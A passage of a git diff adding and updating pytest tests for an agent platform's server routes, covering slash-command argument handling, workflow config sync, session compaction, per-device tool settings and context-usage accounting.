+                "workflow": {"id": workflow_id},
+                "publish": {"type": "api_service"},
+                "triggers": [],
+            }
+        ),
+        encoding="utf-8",
+    )
+    before = config_path.read_text(encoding="utf-8")
+    monkeypatch.chdir(workspace)
+    monkeypatch.setattr(fs_store, "_workspace_root", None)
+
+    async def _fake_storage_read(_key: Any, *_args: Any, **_kwargs: Any) -> None:
+        return None
+
+    monkeypatch.setattr(workflow_routes.Storage, "read", _fake_storage_read)
+
+    workflow_data = {
+        "id": workflow_id,
+        "source": "project",
+        "name": "Demo Workflow",
+        "description": None,
+        "category": "default",
+        "status": "draft",
+        "createdBy": None,
+        "createdAt": 1,
+        "updatedAt": 1,
+        "workflowJson": {
+            "start": "n1",
+            "nodes": [{"id": "n1", "type": "python", "code": "result = {'ok': True}"}],
+            "edges": [],
+        },
+    }
+    trigger = workflow_routes.TriggerDefinition.model_validate(
+        {
+            "id": "schedule-default",
+            "type": "schedule",
+            "enabled": True,
+            "source": {"intervalSeconds": 60},
+            "runtime": {"noOverlap": True},
+        }
+    )
+
+    await workflow_routes._persist_workflow_triggers(workflow_id, workflow_data, [trigger])
+
+    assert config_path.read_text(encoding="utf-8") == before
+
+
+@pytest.mark.asyncio
+async def test_sync_workflow_config_preserves_existing_template(
+    client: AsyncClient,
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    workspace = tmp_path / "workspace"
+    workflow_id = "wf-1"
+    workflow_dir = workspace / ".flocks" / "plugins" / "workflows" / workflow_id
+    workflow_dir.mkdir(parents=True)
+    (workflow_dir / "workflow.json").write_text(
+        json.dumps(
+            {
+                "start": "n1",
+                "nodes": [{"id": "n1", "type": "python", "code": "result = {'ok': True}"}],
+                "edges": [],
+                "triggers": [{"id": "syslog-default", "type": "syslog", "enabled": True}],
+            }
+        ),
+        encoding="utf-8",
+    )
+    template = {
+        "version": 1,
+        "kind": "workflow.integration-config",
+        "workflow": {"id": workflow_id},
+        "publish": {"type": "api_service"},
+        "triggers": [],
+    }
+    config_path = workflow_dir / "config.json"
+    config_path.write_text(json.dumps(template), encoding="utf-8")
+    before = config_path.read_text(encoding="utf-8")
+    monkeypatch.chdir(workspace)
+    monkeypatch.setattr(fs_store, "_workspace_root", None)
+
+    response = await client.post(f"/api/workflow/{workflow_id}/config/sync")
+
+    assert response.status_code == 200, response.text
+    body = response.json()
+    assert body["source"] == "file_migrated"
+    assert body["storageKey"] == workflow_routes._workflow_integration_config_key(workflow_id)
+    assert body["config"]["workflow"]["id"] == workflow_id
+    assert body["config"]["publish"] == {"type": "api_service"}
+    assert body["config"]["triggers"] == []
+    assert config_path.read_text(encoding="utf-8") == before
+    stored = await workflow_routes.Storage.read(workflow_routes._workflow_integration_config_key(workflow_id))
+    assert stored == body["config"]
diff --git a/tests/server/test_input_dispatcher.py b/tests/server/test_input_dispatcher.py
index a69bd2f80..ff1c8bae6 100644
--- a/tests/server/test_input_dispatcher.py
+++ b/tests/server/test_input_dispatcher.py
@@ -1,8 +1,9 @@
 from __future__ import annotations
 
 import asyncio
+import base64
 from types import SimpleNamespace
-from unittest.mock import AsyncMock
+from unittest.mock import AsyncMock, MagicMock
 
 import pytest
 
@@ -19,12 +20,30 @@ def test_resolves_alias_to_canonical_name(self):
         assert parsed.command_name == "reset"
         assert parsed.canonical_name == "new"
 
+    def test_reads_structured_arguments_from_metadata(self):
+        parsed = parse_slash_command(
+            '/bug {"scope":"acp"}',
+            {"commandArgumentsJson": {"scope": "acp"}},
+        )
+        assert parsed is not None
+        assert parsed.args == '{"scope":"acp"}'
+        assert parsed.args_json == {"scope": "acp"}
+
     def test_removed_restart_command_no_longer_resolves(self):
         parsed = parse_slash_command("/restart")
         assert parsed is not None
         assert parsed.command_name == "restart"
         assert parsed.command_def is None
 
+    def test_goal_command_resolves(self):
+        parsed = parse_slash_command("/goal fix tests")
+        assert parsed is not None
+        assert parsed.command_name == "goal"
+        assert parsed.canonical_name == "goal"
+        assert parsed.args == "fix tests"
+        assert parsed.command_def is not None
+        assert parsed.command_def.execution_kind == "direct"
+
 
 class TestDispatchUserInput:
     @pytest.mark.asyncio
@@ -186,6 +205,55 @@ async def test_command_rejects_attachments_when_not_allowed(self):
         assert result.action == "rejected"
         assert "不支持附件" in direct[0]
 
+    @pytest.mark.asyncio
+    async def test_goal_requires_existing_session(self):
+        direct = []
+        sink = CallbackOutputSink(
+            "webui",
+            direct_response=lambda _event, text: _append(direct, text),
+            run_llm=lambda _event, prompt, display: _append([], (prompt, display)),
+        )
+        event = UserInputEvent(
+            source_type="webui",
+            text="/goal fix tests",
+            parts=[{"type": "text", "text": "/goal fix tests"}],
+        )
+
+        result = await dispatch_user_input(event, sink)
+
+        assert result.action == "rejected"
+        assert "需要先有一个会话" in direct[0]
+
+    @pytest.mark.asyncio
+    async def test_goal_set_runs_llm_without_direct_ack(self, monkeypatch):
+        direct = []
+        llm = []
+        sink = CallbackOutputSink(
+            "webui",
+            direct_response=lambda _event, text: _append(direct, text),
+            run_llm=lambda _event, prompt, display: _append(llm, (prompt, display)),
+        )
+        monkeypatch.setattr(
+            "flocks.command.direct.GoalManager.set_goal",
+            AsyncMock(return_value=SimpleNamespace(objective="fix tests", max_turns=20)),
+        )
+        monkeypatch.setattr(
+            "flocks.command.direct.GoalManager.goal_prompt",
+            MagicMock(return_value="goal prompt"),
+        )
+        event = UserInputEvent(
+            source_type="webui",
+            sessionID="ses_goal_dispatch",
+            text="/goal fix tests",
+            parts=[{"type": "text", "text": "/goal fix tests"}],
+        )
+
+        result = await dispatch_user_input(event, sink)
+
+        assert result.action == "llm"
+        assert direct == []
+        assert llm == [("goal prompt", "/goal fix tests")]
+
     @pytest.mark.asyncio
     async def test_channel_unsafe_command_is_rejected(self):
         Command.register(
@@ -285,6 +353,30 @@ async def fake_provide(*, directory, init, fn):
 
 
 class TestPromptQueueRoutes:
+    def test_materialize_queued_data_url_returns_readable_file_uri(self, monkeypatch, tmp_path):
+        from flocks.server.routes import session as session_routes
+        from flocks.session.utils.file_extractor import read_file_part_bytes
+
+        class FakeWorkspace:
+            def resolve_workspace_path(self, rel_path: str):
+                return tmp_path / rel_path
+
+        monkeypatch.setattr(
+            "flocks.workspace.manager.WorkspaceManager.get_instance",
+            lambda: FakeWorkspace(),
+        )
+        data_url = "data:image/png;base64," + base64.b64encode(b"png-bytes").decode()
+
+        url = session_routes._materialize_data_url_part(
+            "ses_windows_uri",
+            data_url,
+            "image/png",
+            "screenshot.png",
+        )
+
+        assert url.startswith("file://")
+        assert read_file_part_bytes(url) == b"png-bytes"
+
     @pytest.mark.asyncio
     async def test_prompt_async_queues_when_session_running_without_creating_message(self, monkeypatch):
         from flocks.server.routes import session as session_routes
diff --git a/tests/server/test_internal_sdk_client.py b/tests/server/test_internal_sdk_client.py
new file mode 100644
index 000000000..801727461
--- /dev/null
+++ b/tests/server/test_internal_sdk_client.py
@@ -0,0 +1,8 @@
+from __future__ import annotations
+
+
+def test_internal_sdk_client_module_imports():
+    import flocks.server.client as client
+
+    assert client.FlocksClient
+    assert client.SessionClient
diff --git a/tests/server/test_server.py b/tests/server/test_server.py
index 6bd56b14b..12ea20652 100644
--- a/tests/server/test_server.py
+++ b/tests/server/test_server.py
@@ -9,7 +9,6 @@
 from fastapi import status
 
 from flocks.server.app import app
-from flocks.task.manager import TaskManager
 from flocks.task.store import TaskStore
 from flocks.task.models import (
     DeliveryStatus,
@@ -54,12 +53,17 @@ async def test_health_check(client):
     assert data["status"] == "healthy"
     assert isinstance(data["version"], str) and data["version"]
     assert "timestamp" in data
-    assert "task_manager_started" in data
-    assert "task_scheduler_running" in data
-    assert "task_scheduler_available" in data
-    assert "task_queue_running" in data
-    assert "task_queue_queued" in data
-    assert "task_stale_running" in data
+    assert "config_dir" in data
+    assert "data_dir" in data
+    assert "task_manager_started" not in data
+    assert "task_scheduler_running" not in data
+    assert "task_scheduler_available" not in data
+    assert "task_manager_error" not in data
+    assert "task_queue_paused" not in data
+    assert "task_queue_running" not in data
+    assert "task_queue_queued" not in data
+    assert "task_stale_running" not in data
+    assert "task_oldest_running_seconds" not in data
 
 
 @pytest.mark.asyncio
@@ -552,4 +556,3 @@ async def test_question_pending_route_lists_session_requests(client):
         clear_request_state(req1["id"])
         clear_request_state(req2["id"])
 
-
diff --git a/tests/server/test_session_command_arguments.py b/tests/server/test_session_command_arguments.py
new file mode 100644
index 000000000..05479db81
--- /dev/null
+++ b/tests/server/test_session_command_arguments.py
@@ -0,0 +1,177 @@
+from __future__ import annotations
+
+import asyncio
+import json
+from types import SimpleNamespace
+from unittest.mock import AsyncMock
+
+import pytest
+
+
+class TestSessionCommandArguments:
+    @pytest.mark.asyncio
+    async def test_command_route_preserves_arguments_json_metadata(self, monkeypatch):
+        from flocks.server.routes import session as session_routes
+
+        dispatch_mock = AsyncMock()
+        session_id = "ses_json_args"
+
+        async def fake_provide(*, directory, init, fn):
+            await fn()
+
+        monkeypatch.setattr(session_routes, "_dispatch_sse_input", dispatch_mock)
+        monkeypatch.setattr("flocks.project.instance.Instance.provide", fake_provide)
+        monkeypatch.setattr(
+            "flocks.session.session.Session.get_by_id",
+            AsyncMock(
+                return_value=SimpleNamespace(
+                    id=session_id,
+                    directory="/tmp/project",
+                )
+            ),
+        )
+
+        payload = {"scope": "acp", "retry": 2}
+        request = session_routes.CommandRequest(command="bug", argumentsJson=payload)
+
+        resp = await session_routes.send_session_command(session_id, request)
+        assert resp["status"] == "accepted"
+        await asyncio.sleep(0)
+
+        dispatch_mock.assert_awaited_once()
+        event = dispatch_mock.await_args.args[2]
+        assert event.text == f"/bug {json.dumps(payload, ensure_ascii=False)}"
+        assert event.display_text == f"/bug {json.dumps(payload, ensure_ascii=False)}"
+        assert event.metadata == {"commandArgumentsJson": payload}
+
+    @pytest.mark.asyncio
+    async def test_command_route_keeps_legacy_string_arguments_unchanged(self, monkeypatch):
+        from flocks.server.routes import session as session_routes
+
+        dispatch_mock = AsyncMock()
+        session_id = "ses_string_args"
+
+        async def fake_provide(*, directory, init, fn):
+            await fn()
+
+        monkeypatch.setattr(session_routes, "_dispatch_sse_input", dispatch_mock)
+        monkeypatch.setattr("flocks.project.instance.Instance.provide", fake_provide)
+        monkeypatch.setattr(
+            "flocks.session.session.Session.get_by_id",
+            AsyncMock(
+                return_value=SimpleNamespace(
+                    id=session_id,
+                    directory="/tmp/project",
+                )
+            ),
+        )
+
+        request = session_routes.CommandRequest(command="bug", arguments="investigate routing")
+
+        resp = await session_routes.send_session_command(session_id, request)
+        assert resp["status"] == "accepted"
+        await asyncio.sleep(0)
+
+        dispatch_mock.assert_awaited_once()
+        event = dispatch_mock.await_args.args[2]
+        assert event.text == "/bug investigate routing"
+        assert event.display_text == "/bug investigate routing"
+        assert event.metadata == {}
+
+    @pytest.mark.asyncio
+    async def test_command_route_prefers_explicit_string_for_display_when_json_also_present(self, monkeypatch):
+        from flocks.server.routes import session as session_routes
+
+        dispatch_mock = AsyncMock()
+        session_id = "ses_both_args"
+
+        async def fake_provide(*, directory, init, fn):
+            await fn()
+
+        monkeypatch.setattr(session_routes, "_dispatch_sse_input", dispatch_mock)
+        monkeypatch.setattr("flocks.project.instance.Instance.provide", fake_provide)
+        monkeypatch.setattr(
+            "flocks.session.session.Session.get_by_id",
+            AsyncMock(
+                return_value=SimpleNamespace(
+                    id=session_id,
+                    directory="/tmp/project",
+                )
+            ),
+        )
+
+        payload = {"scope": "acp"}
+        request = session_routes.CommandRequest(
+            command="bug",
+            arguments="use this exact text",
+            argumentsJson=payload,
+        )
+
+        resp = await session_routes.send_session_command(session_id, request)
+        assert resp["status"] == "accepted"
+        await asyncio.sleep(0)
+
+        dispatch_mock.assert_awaited_once()
+        event = dispatch_mock.await_args.args[2]
+        assert event.text == "/bug use this exact text"
+        assert event.display_text == "/bug use this exact text"
+        assert event.metadata == {"commandArgumentsJson": payload}
+
+    def test_build_prompt_request_from_event_attaches_metadata_to_text_part(self):
+        from flocks.server.routes import session as session_routes
+        from flocks.input.events import UserInputEvent
+
+        event = UserInputEvent(
+            source_type="webui",
+            sessionID="ses_meta_parts",
+            text='/bug {"scope":"acp"}',
+            parts=[
+                {"type": "text", "text": '/bug {"scope":"acp"}', "metadata": {"existing": True}},
+                {"type": "file", "url": "file:///tmp/evidence.txt", "filename": "evidence.txt"},
+            ],
+            metadata={"commandArgumentsJson": {"scope": "acp"}},
+            display_text='/bug {"scope":"acp"}',
+        )
+
+        request = session_routes._build_prompt_request_from_event(event, "/bug {\"scope\":\"acp\"}")
+
+        assert request.parts[0]["type"] == "text"
+        assert request.parts[0]["text"] == "/bug {\"scope\":\"acp\"}"
+        assert request.parts[0]["metadata"] == {
+            "existing": True,
+            "commandArgumentsJson": {"scope": "acp"},
+        }
+        assert request.parts[1] == {
+            "type": "file",
+            "url": "file:///tmp/evidence.txt",
+            "filename": "evidence.txt",
+        }
+
+    @pytest.mark.asyncio
+    async def test_llm_command_path_passes_arguments_json_into_prompt_parts(self, monkeypatch):
+        from flocks.server.routes import session as session_routes
+        from flocks.input.events import UserInputEvent
+
+        session_id = "ses_llm_metadata"
+        event = UserInputEvent(
+            source_type="webui",
+            sessionID=session_id,
+            text='/bug {"scope":"acp"}',
+            parts=[{"type": "text", "text": '/bug {"scope":"acp"}'}],
+            metadata={"commandArgumentsJson": {"scope": "acp"}},
+            display_text='/bug {"scope":"acp"}',
+        )
+        session = SimpleNamespace(id=session_id, directory="/tmp/project")
+
+        process_mock = AsyncMock()
+        monkeypatch.setattr(session_routes, "_process_session_message", process_mock)
+
+        await session_routes._dispatch_sse_input(session_id, session, event, "/tmp/project")
+
+        process_mock.assert_awaited_once()
+        request = process_mock.await_args.args[2]
+        assert request.parts[0]["type"] == "text"
+        assert request.parts[0]["text"] == '/bug {"scope":"acp"}'
+        assert request.parts[0]["metadata"] == {
+            "commandArgumentsJson": {"scope": "acp"},
+        }
diff --git a/tests/server/test_session_compaction_command.py b/tests/server/test_session_compaction_command.py
index 323b91622..2893c5673 100644
--- a/tests/server/test_session_compaction_command.py
+++ b/tests/server/test_session_compaction_command.py
@@ -33,6 +33,16 @@ async def test_run_session_compaction_uses_latest_user_and_publishes_status():
     async def publish_event(event_name: str, payload: dict) -> None:
         events.append((event_name, payload))
 
+    async def publish_context_usage_update(
+        event_publish_callback,
+        session_id: str,
+        **kwargs,
+    ) -> None:  # noqa: ARG001
+        await event_publish_callback(
+            "context.usage.updated",
+            {"sessionID": session_id, "sections": []},
+        )
+
     with patch(
         "flocks.server.routes.session.Session.get_by_id",
         new=AsyncMock(return_value=session),
@@ -51,7 +61,10 @@ async def publish_event(event_name: str, payload: dict) -> None:
     ), patch(
         "flocks.session.lifecycle.compaction.compaction.SessionCompaction.process",
         new=AsyncMock(return_value="continue"),
-    ) as process_mock:
+    ) as process_mock, patch(
+        "flocks.server.routes.session._publish_context_usage_update",
+        new=publish_context_usage_update,
+    ):
         result = await _run_session_compaction(
             "ses_test",
             event_publish_callback=publish_event,
@@ -67,10 +80,87 @@ async def publish_event(event_name: str, payload: dict) -> None:
             "status": {"type": "compacting", "message": "Compacting context…"},
         },
     )
-    assert events[-1] == (
+    idle_event = (
+        "session.status",
+        {"sessionID": "ses_test", "status": {"type": "idle"}},
+    )
+    usage_event = (
+        "context.usage.updated",
+        {"sessionID": "ses_test", "sections": []},
+    )
+    assert idle_event in events
+    assert usage_event in events
+    assert events.index(idle_event) < events.index(usage_event)
+
+
+@pytest.mark.asyncio
+async def test_run_session_compaction_publishes_usage_when_compaction_stops():
+    session = SimpleNamespace(id="ses_test", directory="/tmp")
+    messages = [
+        SimpleNamespace(
+            id="msg_user",
+            role=MessageRole.USER,
+            agent="rex",
+            model={"providerID": "anthropic", "modelID": "claude-test"},
+        ),
+    ]
+    events: list[tuple[str, dict]] = []
+
+    async def publish_event(event_name: str, payload: dict) -> None:
+        events.append((event_name, payload))
+
+    async def publish_context_usage_update(
+        event_publish_callback,
+        session_id: str,
+        **kwargs,
+    ) -> None:  # noqa: ARG001
+        await event_publish_callback(
+            "context.usage.updated",
+            {"sessionID": session_id, "usedTokens": 321, "segments": []},
+        )
+
+    with patch(
+        "flocks.server.routes.session.Session.get_by_id",
+        new=AsyncMock(return_value=session),
+    ), patch(
+        "flocks.server.routes.session._resolve_compaction_context",
+        new=AsyncMock(return_value=("rex", "anthropic", "claude-test")),
+    ), patch(
+        "flocks.session.lifecycle.revert.SessionRevert.cleanup",
+        new=AsyncMock(),
+    ), patch(
+        "flocks.session.message.Message.list",
+        new=AsyncMock(return_value=messages),
+    ), patch(
+        "flocks.provider.provider.Provider.resolve_model_info",
+        return_value=(200_000, 8_192, None),
+    ), patch(
+        "flocks.session.lifecycle.compaction.compaction.SessionCompaction.process",
+        new=AsyncMock(return_value="stop"),
+    ), patch(
+        "flocks.session.lifecycle.compaction.compaction.pop_last_compaction_error",
+        return_value="provider unavailable",
+    ), patch(
+        "flocks.server.routes.session._publish_context_usage_update",
+        new=publish_context_usage_update,
+    ):
+        with pytest.raises(RuntimeError, match="provider unavailable"):
+            await _run_session_compaction(
+                "ses_test",
+                event_publish_callback=publish_event,
+            )
+
+    idle_event = (
         "session.status",
         {"sessionID": "ses_test", "status": {"type": "idle"}},
     )
+    usage_event = (
+        "context.usage.updated",
+        {"sessionID": "ses_test", "usedTokens": 321, "segments": []},
+    )
+    assert idle_event in events
+    assert usage_event in events
+    assert events.index(idle_event) < events.index(usage_event)
 
 
 @pytest.mark.asyncio
diff --git a/tests/server/test_tool_setting_routes.py b/tests/server/test_tool_setting_routes.py
index 1476c3c85..023360fe9 100644
--- a/tests/server/test_tool_setting_routes.py
+++ b/tests/server/test_tool_setting_routes.py
@@ -14,6 +14,7 @@
 
 import json
 from pathlib import Path
+from unittest.mock import AsyncMock
 
 import pytest
 from fastapi import FastAPI
@@ -252,6 +253,64 @@ def test_overlay_disable_works_regardless_of_service(self, tool_client):
         assert enabled_tool.info.enabled is False
         assert _read_settings() == {enabled_tool.info.name: {"enabled": False}}
 
+    def test_device_enable_clears_override_and_enables_global_tool(
+        self, tool_client, monkeypatch: pytest.MonkeyPatch
+    ):
+        client, _, disabled_tool = tool_client
+        _set_service(enabled=True)
+        delete_override = AsyncMock(return_value=True)
+        set_override = AsyncMock()
+        monkeypatch.setattr(
+            "flocks.tool.device.store.delete_device_tool_setting",
+            delete_override,
+        )
+        monkeypatch.setattr(
+            "flocks.tool.device.store.set_device_tool_enabled",
+            set_override,
+        )
+
+        res = client.patch(
+            f"/api/tools/{disabled_tool.info.name}?device_id=dev-a",
+            json={"enabled": True},
+        )
+
+        body = res.json()
+        assert res.status_code == 200
+        assert body["enabled"] is True
+        assert disabled_tool.info.enabled is True
+        assert _read_settings() == {disabled_tool.info.name: {"enabled": True}}
+        delete_override.assert_awaited_once_with("dev-a", disabled_tool.info.name)
+        set_override.assert_not_awaited()
+
+    def test_device_disable_writes_false_override_only(
+        self, tool_client, monkeypatch: pytest.MonkeyPatch
+    ):
+        client, enabled_tool, _ = tool_client
+        _set_service(enabled=True)
+        delete_override = AsyncMock()
+        set_override = AsyncMock()
+        monkeypatch.setattr(
+            "flocks.tool.device.store.delete_device_tool_setting",
+            delete_override,
+        )
+        monkeypatch.setattr(
+            "flocks.tool.device.store.set_device_tool_enabled",
+            set_override,
+        )
+
+        res = client.patch(
+            f"/api/tools/{enabled_tool.info.name}?device_id=dev-a",
+            json={"enabled": False},
+        )
+
+        body = res.json()
+        assert res.status_code == 200
+        assert body["enabled"] is True
+        assert enabled_tool.info.enabled is True
+        assert _read_settings() == {}
+        set_override.assert_awaited_once_with("dev-a", enabled_tool.info.name, False)
+        delete_override.assert_not_awaited()
+
 
 class TestResetToolSetting:
     def test_reset_restores_default_and_removes_overlay(self, tool_client):
diff --git a/tests/session/test_compaction_iterative_summary.py b/tests/session/test_compaction_iterative_summary.py
index 2325a0710..17c0a4117 100644
--- a/tests/session/test_compaction_iterative_summary.py
+++ b/tests/session/test_compaction_iterative_summary.py
@@ -11,6 +11,7 @@
 from __future__ import annotations
 
 import asyncio
+from types import SimpleNamespace
 from typing import Any, List
 from unittest.mock import AsyncMock, MagicMock
 
@@ -20,6 +21,7 @@
     DEFAULT_COMPACTION_PROMPT,
     DEFAULT_COMPACTION_PROMPT_WITH_PREVIOUS,
     ITERATIVE_SUMMARY_REBUILD_INTERVAL,
+    SessionCompaction,
 )
 from flocks.session.lifecycle.compaction import compaction as compaction_module
 from flocks.session.lifecycle.compaction.summary import (
@@ -152,6 +154,278 @@ def __init__(self, content: str) -> None:
         self.content = content
 
 
+def _mwp(
+    message_id: str,
+    role: str,
+    text: str,
+    *,
+    finish: str | None = None,
+    summary: bool | None = None,
+) -> SimpleNamespace:
+    return SimpleNamespace(
+        info=SimpleNamespace(
+            id=message_id,
+            role=role,
+            finish=finish,
+            summary=summary,
+        ),
+        parts=[
+            SimpleNamespace(
+                type="text",
+                text=text,
+            )
+        ],
+    )
+
+
+@pytest.mark.asyncio
+class TestSessionCompactionDeltaInput:
+    async def test_process_summarizes_only_messages_after_latest_summary(
+        self,
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:
+        compaction_module.reset_iterative_summary_cache("ses_delta")
+        captured: dict[str, Any] = {}
+        progress_events: list[tuple[str, dict[str, Any]]] = []
+
+        async def fake_summarize_single_pass(*args: Any, **kwargs: Any) -> str:
+            captured["previous_summary"] = kwargs["previous_summary"]
+            captured["chat_messages"] = kwargs["chat_messages"]
+            return _structured_summary("delta")
+
+        async def fake_archive_and_write_summary(cls, **kwargs: Any) -> str:  # noqa: ARG001
+            return "continue"
+
+        async def fake_dispatch_memory_flush(cls, **kwargs: Any) -> None:  # noqa: ARG001
+            return None
+
+        async def fake_progress(stage: str, data: dict[str, Any]) -> None:
+            progress_events.append((stage, data))
+
+        async def fake_apply_config(cls, **kwargs: Any) -> None:  # noqa: ARG001
+            return None
+
+        async def fake_list_with_parts(cls, session_id: str) -> list:  # noqa: ARG001
+            return msgs_with_parts
+
+        msgs_with_parts = [
+            _mwp("old-user", "user", "old request"),
+            _mwp("old-assistant", "assistant", "old answer", finish="stop"),
+            _mwp(
+                "summary-1",
+                "assistant",
+                "persisted previous summary",
+                finish="summary",
+                summary=True,
+            ),
+            _mwp("new-user", "user", "new request"),
+            _mwp("new-assistant", "assistant", "new answer", finish="stop"),
+            _mwp("compact-command", "user", "/compact"),
+        ]
+
+        from flocks.provider.provider import Provider
+        from flocks.session.message import Message
+
+        monkeypatch.setattr(
+            Provider,
+            "get",
+            classmethod(lambda cls, provider_id: MagicMock()),
+        )
+        monkeypatch.setattr(
+            Provider,
+            "apply_config",
+            classmethod(fake_apply_config),
+        )
+        monkeypatch.setattr(
+            Message,
+            "list_with_parts",
+            classmethod(fake_list_with_parts),
+        )
+        monkeypatch.setattr(
+            compaction_module.summary,
+            "summarize_single_pass",
+            fake_summarize_single_pass,
+        )
+        monkeypatch.setattr(
+            SessionCompaction,
+            "_archive_and_write_summary",
+            classmethod(fake_archive_and_write_summary),
+        )
+        monkeypatch.setattr(
+            SessionCompaction,
+            "_dispatch_memory_flush",
+            classmethod(fake_dispatch_memory_flush),
+        )
+
+        result = await SessionCompaction.process(
+            session_id="ses_delta",
+            parent_id="compact-command",
+            messages=[{"id": "compact-command"}],
+            model_id="test-model",
+            provider_id="test-provider",
+            auto=False,
+            progress_callback=fake_progress,
+        )
+
+        assert result == "continue"
+        assert captured["previous_summary"] == "persisted previous summary"
+        assert [
+            message.content
+            for message in captured["chat_messages"]
+        ] == ["new request", "new answer"]
+        assert ("load", {
+            "message_count": 2,
+            "total_chars": len("new request") + len("new answer"),
+        }) in progress_events
+
+    async def test_process_skips_when_only_compact_command_follows_summary(
+        self,
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:
+        compaction_module.reset_iterative_summary_cache("ses_no_delta")
+        progress_events: list[tuple[str, dict[str, Any]]] = []
+        summarize_spy = AsyncMock(return_value=_structured_summary("unexpected"))
+        archive_spy = AsyncMock(return_value="continue")
+
+        async def fake_progress(stage: str, data: dict[str, Any]) -> None:
+            progress_events.append((stage, data))
+
+        async def fake_apply_config(cls, **kwargs: Any) -> None:  # noqa: ARG001
+            return None
+
+        async def fake_list_with_parts(cls, session_id: str) -> list:  # noqa: ARG001
+            return msgs_with_parts
+
+        msgs_with_parts = [
+            _mwp(
+                "summary-1",
+                "assistant",
+                "persisted previous summary",
+                finish="summary",
+                summary=True,
+            ),
+            _mwp("compact-command", "user", "/compact"),
+        ]
+
+        from flocks.provider.provider import Provider
+        from flocks.session.message import Message
+
+        monkeypatch.setattr(
+            Provider,
+            "get",
+            classmethod(lambda cls, provider_id: MagicMock()),
+        )
+        monkeypatch.setattr(
+            Provider,
+            "apply_config",
+            classmethod(fake_apply_config),
+        )
+        monkeypatch.setattr(
+            Message,
+            "list_with_parts",
+            classmethod(fake_list_with_parts),
+        )
+        monkeypatch.setattr(
+            compaction_module.summary,
+            "summarize_single_pass",
+            summarize_spy,
+        )
+        monkeypatch.setattr(
+            SessionCompaction,
+            "_archive_and_write_summary",
+            classmethod(lambda cls, **kwargs: archive_spy(**kwargs)),
+        )
+
+        result = await SessionCompaction.process(
+            session_id="ses_no_delta",
+            parent_id="compact-command",
+            messages=[{"id": "compact-command"}],
+            model_id="test-model",
+            provider_id="test-provider",
+            auto=False,
+            progress_callback=fake_progress,
+        )
+
+        assert result == "skipped"
+        summarize_spy.assert_not_awaited()
+        archive_spy.assert_not_awaited()
+        assert ("load", {"message_count": 0, "total_chars": 0}) in progress_events
+        assert (
+            "complete",
+            {"result": "skipped_no_new_messages"},
+        ) in progress_events
+
+    async def test_process_skips_when_only_control_message_exists(
+        self,
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:
+        compaction_module.reset_iterative_summary_cache("ses_empty_delta")
+        progress_events: list[tuple[str, dict[str, Any]]] = []
+        summarize_spy = AsyncMock(return_value=_structured_summary("unexpected"))
+        archive_spy = AsyncMock(return_value="continue")
+
+        async def fake_progress(stage: str, data: dict[str, Any]) -> None:
+            progress_events.append((stage, data))
+
+        async def fake_apply_config(cls, **kwargs: Any) -> None:  # noqa: ARG001
+            return None
+
+        async def fake_list_with_parts(cls, session_id: str) -> list:  # noqa: ARG001
+            return msgs_with_parts
+
+        msgs_with_parts = [
+            _mwp("compact-command", "user", "/compact"),
+        ]
+
+        from flocks.provider.provider import Provider
+        from flocks.session.message import Message
+
+        monkeypatch.setattr(
+            Provider,
+            "get",
+            classmethod(lambda cls, provider_id: MagicMock()),
+        )
+        monkeypatch.setattr(
+            Provider,
+            "apply_config",
+            classmethod(fake_apply_config),
+        )
+        monkeypatch.setattr(
+            Message,
+            "list_with_parts",
+            classmethod(fake_list_with_parts),
+        )
+        monkeypatch.setattr(
+            compaction_module.summary,
+            "summarize_single_pass",
+            summarize_spy,
+        )
+        monkeypatch.setattr(
+            SessionCompaction,
+            "_archive_and_write_summary",
+            classmethod(lambda cls, **kwargs: archive_spy(**kwargs)),
+        )
+
+        result = await SessionCompaction.process(
+            session_id="ses_empty_delta",
+            parent_id="compact-command",
+            messages=[{"id": "compact-command"}],
+            model_id="test-model",
+            provider_id="test-provider",
+            auto=False,
+            progress_callback=fake_progress,
+        )
+
+        assert result == "skipped"
+        summarize_spy.assert_not_awaited()
+        archive_spy.assert_not_awaited()
+        assert ("load", {"message_count": 0, "total_chars": 0}) in progress_events
+        assert (
+            "complete",
+            {"result": "skipped_no_summary_input"},
+        ) in progress_events
+
+
 @pytest.mark.asyncio
 class TestSummarizeChunkedIterative:
     async def test_calls_provider_once_per_chunk_no_merge(self) -> None:
@@ -336,4 +610,3 @@ async def test_no_previous_summary_uses_default_prompt(self) -> None:
         body = call.kwargs["messages"][0].content
         assert "<<<PREVIOUS_SUMMARY>>>" not in body
         assert "## Decisions" in body
-
diff --git a/tests/session/test_context_usage.py b/tests/session/test_context_usage.py
new file mode 100644
index 000000000..47d0e7347
--- /dev/null
+++ b/tests/session/test_context_usage.py
@@ -0,0 +1,266 @@
+from types import SimpleNamespace
+
+import pytest
+
+from flocks.session import context_usage
+
+
+def _message(
+    message_id: str,
+    *,
+    role: str = "assistant",
+    created: int = 100,
+    tokens=None,
+    provider_id: str = "openai",
+    model_id: str = "gpt-4.1",
+    finish: str | None = "stop",
+    summary=None,
+    compacted=None,
+):
+    return SimpleNamespace(
+        id=message_id,
+        role=role,
+        time=SimpleNamespace(created=created),
+        tokens=tokens,
+        providerID=provider_id,
+        modelID=model_id,
+        finish=finish,
+        summary=summary,
+        compacted=compacted,
+    )
+
+
+@pytest.fixture
+def context_usage_mocks(monkeypatch):
+    state = {
+        "active": [],
+        "all": [],
+        "estimate": 0,
+        "system_prompt": 0,
+        "tool_definitions": 0,
+        "parts": {},
+        "list_calls": [],
+    }
+
+    async def fake_list(session_id: str, include_archived: bool = False):
+        state["list_calls"].append(include_archived)
+        return list(state["all"] if include_archived else state["active"])
+
+    async def fake_parts(message_id: str, session_id: str | None = None):
+        return list(state["parts"].get(message_id, []))
+
+    async def fake_estimate(session_id: str, messages: list):
+        return state["estimate"]
+
+    async def fake_system_prompt_tokens(*args, **kwargs):
+        return state["system_prompt"]
+
+    async def fake_tool_definition_tokens(*args, **kwargs):
+        return state["tool_definitions"], ()
+
+    monkeypatch.setattr(context_usage.Message, "list", fake_list)
+    monkeypatch.setattr(context_usage.Message, "parts", fake_parts)
+    monkeypatch.setattr(
+        context_usage.SessionPrompt,
+        "estimate_full_context_tokens",
+        fake_estimate,
+    )
+    monkeypatch.setattr(
+        context_usage.Provider,
+        "resolve_model_info",
+        lambda provider_id, model_id: (200, 50, None),
+    )
+    monkeypatch.setattr(
+        context_usage,
+        "_estimate_system_prompt_tokens",
